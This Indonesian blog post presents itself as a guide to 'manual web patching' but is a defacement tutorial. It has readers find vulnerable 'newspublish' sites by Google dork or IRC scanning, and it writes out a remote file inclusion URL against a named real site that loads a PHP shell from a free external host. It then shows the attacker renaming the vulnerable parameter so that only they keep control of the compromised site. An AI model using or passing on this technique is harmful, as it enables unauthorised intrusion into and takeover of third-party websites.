Patching Web Secara Manual

web patchingGa seru kalo kita hanya bisa melakukan deface web target tanpa pernah mau tahu untuk menutup bug tersebut [ admin security yang baik harus berpikiran secara positif ], padahal untuk menutup bug pada web target bisa dilakukan dengan banyak cara dan kita bisa melakukannya secara manual, penulis akan mencoba memberikan step by step langkah melakukan patching manual secara sederhana tidak perlu berpikiran terlalu jauh karena dengan tehnik ini akan dapat menipu sang penyerang untuk bisa masuk ke dalam target, ok’s penulis coba ambil situs luar [ just for test admin ], kenapa penulis tidak mengambil contoh web target lokal ? jawabannya simpel dan sederhana ada dibenak anda , langsung aja jalankan paman google masukan string bug untuk : newspublish/, atau bila ga mau pusing masuk ke Server IRC cari chanel Underground Indonesia dan lakukan scanning terhadap target dengan string = !scan newspublish/include.php?path[docroot]=, penulis ambil contoh target : http://www.popolariudeur.pv.it/public/amministrazione/newspublish/include.php?path[docroot]=
kemudian seperti biasa lakukan penetrasi dengan phpshell yang kita tanam di situs gratisan, seperti dibawah ini, http://www.popolariudeur.pv.it/public/amministrazione/newspublish/include.php?path[docroot]= http://ernigalak.t35.com/mama.txt? Maka akan nampak seperti dibawah ini hasilnya :

perhatikan letak file yang bermasalah terdapat di file include.php, perhatikan di dalam phpshell 99 bahwa file yang bermasalah pasti akan berbeda dengan file lainnya , yaitu dari warnanya yang kuning ,
disini penulis tidak akan membahas kenapa file yang bermasalah itu dapat di injeksi oleh phpshell, next time penulis akan buat artikelnya, so kembali ke awal, kemudian change mode file tersebut dengan permit 0777 istilah kerennya mah bisa dibaca,diliat, ditulis, dimodifikasi, xixixxix bingung ? ya pegangan tembok mas/mbak, just kidding , coba longok basis linux commands, liat di bawah ini :

Lakukan save, kemudian kembali ke halaman http://www.popolariudeur.pv.it/public/amministrazione/newspublish , setelah kita buat permit 0777, langkah berikutnya adalah melihat file include.php, klik file include.php perhatikan script yang bermasalah yaitu ada pada” include{$path[“docroot”].”newpublish/class.news.php”};

coba kita akan ambil logika dari halaman ini, perhatikan sekali lagi tulisan “docroot”, apakah bila kita rubah tulisan ini akan dapat mengecoh sang penyerang ? pertanyaan yang bagus, kita dapat asumsikan dengan sesorang yang mengetahui kunci rumah kita dan sewaktu-waktu dapat masuk kapan saja, tetapi bila kita rubah kunci tersebut dengan kunci lain, apakah seseorang dapat masuk juga ? penulis ga mau jawab pertanyaannya, anda yang tahu jawabannya, xixixix, btw balik lagi ke awal sekarang kita akan coba merubah tulisan ini dengan tulisan lain , penulis ambil contoh melakukan perubahan tulisan docroot menjadi tulisan cyberlog [ docroot rename cyberlog ], kita akan membuktikan apakah dengan merubah tulisan tersebut dapat mengecoh sang penyerang ?. sebelum melakukan perubahan pastikan file include.php dalam permitt 0777 [ all modication ], ok saatnya klik di sebelah kanan phpshell 99 file include.php , edit file include seperti dibawah ini :

penulis lakukan perubahan tulisan “docroot” menjadi tulisan “cyberlog”, kemudian save perubahan tersebut, bila memang permitt 0777 file akan dapat tersimpan seperti dibawah ini

 

Kemudian coba kita lakukan penetrasi seperti awal tadi, perhatikan maka halaman akan error, coz secara logika penyerang akan kesulitan untuk masuk ke dalam web target lewat bug tersebut karena kita sudah lakukan perubahan terhadap tulisan “docroot”

 

 

Sekarang kita coba lakukan penetrasi dengan perubahan yang tadi kita buat maka akan nampak hasil seperti dibawah ini :

Liat kita dapat masuk kedalam target ?, dengan hanya bermodalkan sedikit alur logika kita, kita dapat lakukan pacthing secara sederhana tanpa perlu susah payah melakukan update secara otomatis serta dapat menguasai web target sendirian tanpa orang lain bisa masuk

Leave a comment

Your email address will not be published.


*